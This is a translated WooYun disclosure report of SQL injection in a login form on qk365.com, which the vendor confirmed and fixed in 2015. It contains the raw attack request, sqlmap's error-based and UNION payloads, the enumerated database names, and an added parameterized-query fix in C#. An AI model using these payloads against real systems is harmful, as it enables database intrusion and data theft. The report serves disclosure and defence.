
Vulnerability summary

Defect ID: wooyun-2015-0152112

Title: 青客 (Qingke) SQL injection (27 databases)

Vendor: qk365.com

Author: 天地不仁 以万物为刍狗

Submitted: 2015-11-06 11:13

Fixed: 2015-12-21 19:02

Published: 2015-12-21 19:02

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-11-06: details sent to the vendor, awaiting vendor handling
2015-11-06: vendor confirmed; details visible to the vendor only
2015-11-16: details opened to core white hats and domain experts
2015-11-26: details opened to regular white hats
2015-12-06: details opened to intern white hats
2015-12-21: details opened to the public

Brief description:

2333

Details:

POST /Tentct/Login.aspx HTTP/1.1
Host: km.qk365.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://km.qk365.com/Tentct/Login.aspx
Cookie: Hm_lvt_53c8bf761df44282a0cf7d4949581592=1446710154; Hm_lpvt_53c8bf761df44282a0cf7d4949581592=1446710163; _ga=GA1.2.837828670.1446710155; LXB_REFER=www.wooyun.org; ASP.NET_SessionId=xz1yzy55pt5wpqizuh5k2k55
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 319
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNzkyODY2ODA2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b%2BrTX22oGpB3az%2BQ5MK&txt_Code=admin&txt_Password=123456&imageField.x=0&imageField.y=0&__EVENTVALIDATION=%2FwEWBALXrurxCALLm6aZAgLS9cL8AgKrg9HsD%2F6wTuGPHEaKThJjkc8fmNFk3e%2BR


The txt_Code POST parameter is injectable.

[screenshot: 0.png]

[screenshot: 1.png]


Proof of vulnerability:

POST parameter 'txt_Code' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 42 HTTP(s) requests:
---
Parameter: txt_Code (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNzkyODY2ODA2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b+rTX22oGpB3az+Q5MK&txt_Code=admin' AND 3112=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3112=3112) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(118)+CHAR(113))) AND 'yCuW'='yCuW&txt_Password=123456&imageField.x=0&imageField.y=0&__EVENTVALIDATION=/wEWBALXrurxCALLm6aZAgLS9cL8AgKrg9HsD/6wTuGPHEaKThJjkc8fmNFk3e+R

    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNzkyODY2ODA2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b+rTX22oGpB3az+Q5MK&txt_Code=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(82)+CHAR(80)+CHAR(67)+CHAR(104)+CHAR(81)+CHAR(89)+CHAR(110)+CHAR(81)+CHAR(108)+CHAR(109)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &txt_Password=123456&imageField.x=0&imageField.y=0&__EVENTVALIDATION=/wEWBALXrurxCALLm6aZAgLS9cL8AgKrg9HsD/6wTuGPHEaKThJjkc8fmNFk3e+R
---
[18:16:02] [INFO] testing Microsoft SQL Server
[18:16:03] [INFO] confirming Microsoft SQL Server
[18:16:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[18:16:04] [INFO] fetching database names
[18:16:04] [INFO] the SQL query used returns 28 entries
[18:16:04] [INFO] retrieved: 20141231
[18:16:05] [INFO] retrieved: master
[18:16:05] [INFO] retrieved: model
[18:16:05] [INFO] retrieved: msdb
[18:16:06] [INFO] retrieved: new_0430
[18:16:06] [INFO] retrieved: new_HouseRent_20141130
[18:16:06] [INFO] retrieved: new_HouseRent_20141130
[18:16:07] [INFO] retrieved: new_HouseRent_20141201
[18:16:07] [INFO] retrieved: new_HouseRent_20141228
[18:16:07] [INFO] retrieved: new_HouseRent_20150119
[18:16:07] [INFO] retrieved: new_HouseRent_20150120
[18:16:08] [INFO] retrieved: new_HouseRent_20150205
[18:16:08] [INFO] retrieved: new_HouseRent_20150301
[18:16:08] [INFO] retrieved: new_HouseRent_20150306
[18:16:10] [INFO] retrieved: new_HouseRent_20150325
[18:16:11] [INFO] retrieved: new_HouseRent_20150401
[18:16:11] [INFO] retrieved: new_HouseRent_20150405
[18:16:11] [INFO] retrieved: new_HouseRent_20150501_0
[18:16:11] [INFO] retrieved: new_HouseRent_20150605
[18:16:11] [INFO] retrieved: new_HouseRent_20150731
[18:16:12] [INFO] retrieved: new_HouseRent_20150930
[18:16:12] [INFO] retrieved: ReportServer
[18:16:12] [INFO] retrieved: ReportServerTempDB
[18:16:15] [INFO] retrieved: tempdb
[18:16:16] [INFO] retrieved: tmp_1018
[18:16:16] [INFO] retrieved: tmp_1019
[18:16:16] [INFO] retrieved: tmp_1020
[18:16:16] [INFO] retrieved: tmp_111
available databases [27]:
[*] 20141231
[*] master
[*] model
[*] msdb
[*] new_0430
[*] new_HouseRent_20141130
[*] new_HouseRent_20141201
[*] new_HouseRent_20141228
[*] new_HouseRent_20150119
[*] new_HouseRent_20150120
[*] new_HouseRent_20150205
[*] new_HouseRent_20150301
[*] new_HouseRent_20150306
[*] new_HouseRent_20150325
[*] new_HouseRent_20150401
[*] new_HouseRent_20150405
[*] new_HouseRent_20150501_0
[*] new_HouseRent_20150605
[*] new_HouseRent_20150731
[*] new_HouseRent_20150930
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] tmp_1018
[*] tmp_1019
[*] tmp_1020
[*] tmp_111
[18:16:17] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 52 times
[18:16:17] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\km.qk365.com'
[*] shutting down at 18:16:17

Fix:
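The report leaves this section empty. As an added example (not part of the original report and not qk365.com's code), the C# below shows the login-query pattern that produces the behaviour sqlmap recorded above, next to the parameterized form that removes it. The Users table, its UserId, Code and PasswordHash columns, and the class name LoginQueries are assumptions chosen to mirror the txt_Code and txt_Password form fields in the request.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Hypothetical code-behind for a Login.aspx-style form (added illustration; the
// "Users" table and its column names are assumptions, not the vendor's schema).
public static class LoginQueries
{
    // Vulnerable pattern: the form value is spliced into the SQL text. A value such
    // as  admin' AND ... AND 'a'='a  closes the string literal and the remainder is
    // parsed as SQL, which is exactly what the error-based and UNION findings above
    // depend on. Kept here only to show the shape of the defect.
    public static string BuildConcatenatedQuery(string code)
    {
        return "SELECT UserId, PasswordHash FROM Users WHERE Code = '" + code + "'";
    }

    // Hardened version: the SQL text is a constant and the value is bound as a
    // typed parameter. SQL Server receives text and value separately, so a quote,
    // a CHAR() chain or a UNION inside the value is compared as a string and never
    // parsed. The caller verifies the submitted password against passwordHash with
    // a slow password hash; that step is outside this example.
    public static bool TryLookupUser(string connectionString, string code,
                                     out int userId, out string passwordHash)
    {
        userId = 0;
        passwordHash = null;
        const string sql = "SELECT UserId, PasswordHash FROM Users WHERE Code = @code";

        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            // Explicit NVARCHAR(50) (assumed column length): the parameter's type
            // is fixed by the code, not inferred from whatever the client sent.
            cmd.Parameters.Add("@code", SqlDbType.NVarChar, 50).Value = code ?? string.Empty;
            conn.Open();
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                if (!reader.Read())
                    return false;   // unknown code: generic failure, no DB error text
                userId = reader.GetInt32(0);
                passwordHash = reader.GetString(1);
                return true;
            }
        }
    }
}
```

Two points worth noting from the output above. The error-based technique works only because the conversion error text reached the client (the run logged 52 HTTP 500 responses), so `<customErrors mode="On">` in web.config would hide it; it is not a fix, because the UNION technique listed on the same page needs no error text at all. Operationally, a burst of 500s on a login POST from a single client, with quotes or CHAR() sequences in the form body, is the signal a defender would alert on.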

Copyright notice: when reposting, credit the source: 天地不仁 以万物为刍狗@WooYun


Vulnerability response

Vendor response:

Severity: High

Rank: 10

Confirmed: 2015-11-06 19:01

Vendor reply:

Thank you very much; an emergency fix has been scheduled.

Latest status:

None yet